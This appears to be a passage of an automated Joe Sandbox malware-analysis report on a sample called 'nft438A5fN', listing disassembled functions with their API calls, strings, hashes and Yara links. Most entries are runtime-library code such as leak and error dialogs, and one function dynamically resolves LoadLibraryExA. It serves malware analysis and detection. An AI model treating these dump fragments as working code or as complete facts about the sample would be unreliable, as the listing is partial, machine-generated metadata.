                                                                      • _free.LIBCMT ref: 02D689D7
                                                                      • _free.LIBCMT ref: 02D689DE
                                                                      • _free.LIBCMT ref: 02D689FB
                                                                      • _free.LIBCMT ref: 02D68A13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 3658870901-0
                                                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                      • Instruction ID: 8b080d10a0580409dbaf4324cc968ec68221f8e499853cf5d96991be208618e2
                                                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                      • Instruction Fuzzy Hash: C7313A31604315AFEF20AF78D84CB6AB7EAEF01314F50881AE858D6350DB72AD44DB21
                                                                      Function 02D67C10 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                      • Instruction ID: 2c8f84822aff72aef8f79dc0355ff8121654ec1f8a718e3f0c3fceb6bb90d6a5
                                                                      • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                      • Instruction Fuzzy Hash: B7C10072940209AFEB20DBA8DC85FEEB7A9EB09744F144155FA48FB381D674AD418B70
                                                                      Function 02C92530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C928CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                      • API String ID: 2030045667-32948583
                                                                      • Opcode ID: a203385aea133ab775cc5aae9f9ed7b91cdea0c2996a6570743643b9ed6d372a
                                                                      • Instruction ID: d8e1a71591f4510d0e459cddc3da1b44edfb38380cb2622db7caef378df06862
                                                                      • Opcode Fuzzy Hash: a203385aea133ab775cc5aae9f9ed7b91cdea0c2996a6570743643b9ed6d372a
                                                                      • Instruction Fuzzy Hash: 95A1E430A04254AFDF21AA2CCC88BD9B6E5EF49750F1440E5DDC9AB385CB758A85CF92
                                                                      Function 02D2842C Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D28439
                                                                      • int.LIBCPMT ref: 02D2844C
                                                                        • Part of subcall function 02D2568C: std::_Lockit::_Lockit.LIBCPMT ref: 02D2569D
                                                                        • Part of subcall function 02D2568C: std::_Lockit::~_Lockit.LIBCPMT ref: 02D256B7
                                                                      • std::_Facet_Register.LIBCPMT ref: 02D2848C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D28495
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D284B3
                                                                      • __Init_thread_footer.LIBCMT ref: 02D284F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                      • String ID: ,kG$0kG$@!G
                                                                      • API String ID: 3815856325-312998898
                                                                      • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                                      • Instruction ID: 38e272c1458405e5393350c4a40c6baa62ae4dfecdb5f5daca0d42cd7fb65e7e
                                                                      • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                                      • Instruction Fuzzy Hash: A721F232900530ABCB14AB68D84099D77AADF55724F21416AE819E7390DF31AE49CFB5
                                                                      Function 02D5F731 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                      • Instruction ID: 6d1a4591bd08889c20d1c1f0e94a4c4af412a1e7020937e5bf865b144576973b
                                                                      • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                      • Instruction Fuzzy Hash: 36115076500218BFCF01EF54C941E993FA6FF05350F9184A6BE488B621EBB2DE509FA0
                                                                      Function 02C9252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • bytes: , xrefs: 02C9275D
                                                                      • , xrefs: 02C92814
                                                                      • 7, xrefs: 02C926A1
                                                                      • An unexpected memory leak has occurred. , xrefs: 02C92690
                                                                      • Unexpected Memory Leak, xrefs: 02C928C0
                                                                      • The unexpected small block leaks are:, xrefs: 02C92707
                                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C92849
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                      • API String ID: 0-2723507874
                                                                      • Opcode ID: 6c85c02ba1ac1415b11bc3eedcf8d7daf0b146463e5afa62214ce6b63db2d0d9
                                                                      • Instruction ID: aa600cfaed749194127797e7c3aa70c96f4c4e22c1866249c61de0bfc4f26340
                                                                      • Opcode Fuzzy Hash: 6c85c02ba1ac1415b11bc3eedcf8d7daf0b146463e5afa62214ce6b63db2d0d9
                                                                      • Instruction Fuzzy Hash: FD71C330A04298AFDF219B2CCC88BD9BAE5EF49700F1440E5D989E7281DB758AC5CF52
                                                                      Function 02D5C78A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$_abort_memcmp
                                                                      • String ID: C
                                                                      • API String ID: 137591632-1037565863
                                                                      • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                                      • Instruction ID: a2a63f1e58ee53e6c62353e88c88f6d63a3b775c8240791b8b0f09a5839fe407
                                                                      • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                                      • Instruction Fuzzy Hash: F3B15975A117299FDF24DF18C884BADB7B5FB08304F5085AAD84AA7350E7B1AE80CF50
                                                                      Function 02D243C4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 204COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 6$8+G$8+G$xdF
                                                                      • API String ID: 176396367-2796295669
                                                                      • Opcode ID: 56fbe24947130a928e24310efb581028cf1661c032902341b78b8900ef296844
                                                                      • Instruction ID: a52be5c1cd552fd458945f23f6d0bb323bb53eea495c00e97f528a733cac5801
                                                                      • Opcode Fuzzy Hash: 56fbe24947130a928e24310efb581028cf1661c032902341b78b8900ef296844
                                                                      • Instruction Fuzzy Hash: 3351C7602043107BD704B734EC71AAE739EDFA4B59F00841DF84A867D2EF999D09CA7A
                                                                      Function 02C9BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(00000000,02C9C08B,?,?,00000000,00000000), ref: 02C9BDF6
                                                                        • Part of subcall function 02C9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locale$InfoThread
                                                                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                      • API String ID: 4232894706-2493093252
                                                                      • Opcode ID: 1b88f80e50bc1ae76ee93859a69ab1923db896d90e1bd8635ede50006add9d3a
                                                                      • Instruction ID: 92701db79519490e06d53037fbd07094ab492334738682bc353e9a4d8e446101
                                                                      • Opcode Fuzzy Hash: 1b88f80e50bc1ae76ee93859a69ab1923db896d90e1bd8635ede50006add9d3a
                                                                      • Instruction Fuzzy Hash: 6C616274B10148ABDF04EBA4D85879F77BBDB88700F509436E1019B785CA39DE06EF94
                                                                      Function 02CAAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAB000
                                                                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02CAB017
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAB0AB
                                                                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 02CAB0B7
                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02CAB0CB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Read$HandleModule
                                                                      • String ID: KernelBase$LoadLibraryExA
                                                                      • API String ID: 2226866862-113032527
                                                                      • Opcode ID: d02923d5972317dba872601836d87b1a0f5734a3e2c13581382dbc573742b09a
                                                                      • Instruction ID: c1685a4dbc7a54ee82c9f544b2fa17ed9279c1e23fb03c8d6fd1d7e343617ed1
                                                                      • Opcode Fuzzy Hash: d02923d5972317dba872601836d87b1a0f5734a3e2c13581382dbc573742b09a
                                                                      • Instruction Fuzzy Hash: AD3150B1640306BBEF20DB69CC96F5A77A8BF5535CF004655EA24AB2C1D334AE50DBA0
                                                                      Function 02C9435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?,02D167C8,?,?,02CBE7A8,02C965B1,02CBD30D), ref: 02C94395
                                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?,02D167C8,?,?,02CBE7A8,02C965B1,02CBD30D), ref: 02C9439B
                                                                      • GetStdHandle.KERNEL32(000000F5,02C943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?,02D167C8), ref: 02C943B0
                                                                      • WriteFile.KERNEL32(00000000,000000F5,02C943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?), ref: 02C943B6
                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C943D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleWrite$Message
                                                                      • String ID: Error$Runtime error at 00000000
                                                                      • API String ID: 1570097196-2970929446
                                                                      • Opcode ID: 9ff8094952c873e704e12935289e35200c8f56c5982b931d550bc4c46f8d85e3
                                                                      • Instruction ID: c0b0e943c2df4a8ea0622655e76e4ac7a92a0b2ad0c79d9c235c15fc8f5c2ad8
                                                                      • Opcode Fuzzy Hash: 9ff8094952c873e704e12935289e35200c8f56c5982b931d550bc4c46f8d85e3
                                                                      • Instruction Fuzzy Hash: EAF02B70AC430075FE29A2707C4FF99239C5744F11F944615F318649D0C7E448C19F11
                                                                      Function 02D68035 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                                      • Instruction ID: 50300f9529a3770a5870661fa551abadf29922469e6e41fc09cd4d3a62ee185c
                                                                      • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                                      • Instruction Fuzzy Hash: 6B61C071900315AFDB20DF68CC45BAABBF6EB49710F14816AE998EB340E770AD45DB60
                                                                      Function 02D6850A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                      • Instruction ID: 244d18901d3c85398c416f2761eb0c594820d5ce4180f25541ce6014f0d51178
                                                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                      • Instruction Fuzzy Hash: 2A116A31580B14ABDA20BFB0CC09FDB7B9EEF49700F808C15E699B6250DB65ED489B71
                                                                      Function 02D2872E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D2873B
                                                                      • int.LIBCPMT ref: 02D2874E
                                                                        • Part of subcall function 02D2568C: std::_Lockit::_Lockit.LIBCPMT ref: 02D2569D
                                                                        • Part of subcall function 02D2568C: std::_Lockit::~_Lockit.LIBCPMT ref: 02D256B7
                                                                      • std::_Facet_Register.LIBCPMT ref: 02D2878E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D28797
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D287B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                      • String ID: (mG
                                                                      • API String ID: 2536120697-4059303827
                                                                      • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                                      • Instruction ID: 404f45725ac7185b60bfa77670f46fbf6ea270127efeeddabfbb66624462023c
                                                                      • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                                      • Instruction Fuzzy Hash: FA110632A00134ABCB14EBA8D804CDDB76ADF60725F11416AE915E7390DF309E49CFE0
                                                                      Function 02C9AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02C9AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9AD59
                                                                        • Part of subcall function 02C9AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9AD7D
                                                                        • Part of subcall function 02C9AD3C: GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD98
                                                                        • Part of subcall function 02C9AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9AE2E
                                                                      • CharToOemA.USER32(?,?), ref: 02C9AEFB
                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF18
                                                                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF1E
                                                                      • GetStdHandle.KERNEL32(000000F4,02C9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF33
                                                                      • WriteFile.KERNEL32(00000000,000000F4,02C9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF39
                                                                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C9AF5B
